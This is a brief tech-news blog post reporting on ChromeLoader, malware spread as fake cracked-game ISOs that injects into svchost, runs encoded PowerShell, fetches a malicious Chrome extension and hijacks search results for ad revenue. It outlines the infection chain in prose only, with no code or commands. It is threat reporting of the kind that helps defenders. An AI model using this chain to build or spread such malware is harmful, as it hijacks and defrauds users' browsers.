September 22, 2023


Networking, Computer, PBX, IT, DIY Solution

Windows malware injects malicious extensions into Chrome via PowerShell

3 min read

Windows malware injects malicious extensions into Chrome via PowerShell

Windows malware injects malicious extensions into Chrome via PowerShell.

According to news from The register , a Windows malware called ChromeLoader has recently appeared on the Internet, which uses PowerShell to add malicious extensions to the victim’s Chrome browser.

This malicious Chrome extension forcibly redirects users with online advertisements to generate revenue for the bad guys.

There is also a macOS variant of the malware that uses Bash to achieve the same goal, targeting Safari. Aedan Russell, an engineer at security firm Red Canary , detailed the malware in a blog post .

ChromeLoader is distributed as an ISO file that looks like a torrent file or a cracked video game.

According to Red Canary, it spreads online through websites and social media such as Twitter, via links or QR codes.

Windows malware injects malicious extensions into Chrome via PowerShell

Once downloaded and executed, the .ISO file is extracted and installed as a driver on the victim’s machine, thereby gaining initial access to the system.

This ISO has an executable for installing ChromeLoader, and what appears to be a .NET wrapper for the Windows Task Scheduler.

This allows ChromeLoader to remain camouflaged after a breach, maintaining its persistence on the victim machine.

ChromeLoader uses scheduled tasks, but not the Windows native task scheduler (schtasks.exe) to do so.

Instead, it injects the service host (svchost.exe) across processes and creates its scheduled task scheduler.

After the cross-process injection is completed, the ChromeLoader’s scheduled task is executed through svchost, which invokes the command interpreter (cmd.exe), which executes a Base64-encoded PowerShell command containing multiple declared variables.

ChromeLoader then starts using PowerShell commands to check if the ChromeLoader malicious extension is installed, and if the path is not found, it uses wget to remotely pull the file and load the content as a Chrome extension.

When the ChromeLoader malicious extension is installed into Chrome, it can perform its real goal: forcibly modify the victim’s search results, redirecting them to malicious advertising sites.

ChromeLoader also redirects when the user tries to delete the extension, forcing the user to leave the Chrome extension page.

Additionally, PowerShell is always the preferred command execution method for malware due to its ability as a command and script interpreter.

Aedan Russell said: “This is a new way to load malicious extensions into Chrome, and other than ChromeLoader, no other known threat actors are trying to use this PowerShell technique to load malicious browser extensions “

“However, this technique is well-documented, and it’s often used by developers .”


Copyright © All rights reserved. | Newsphere by AF themes.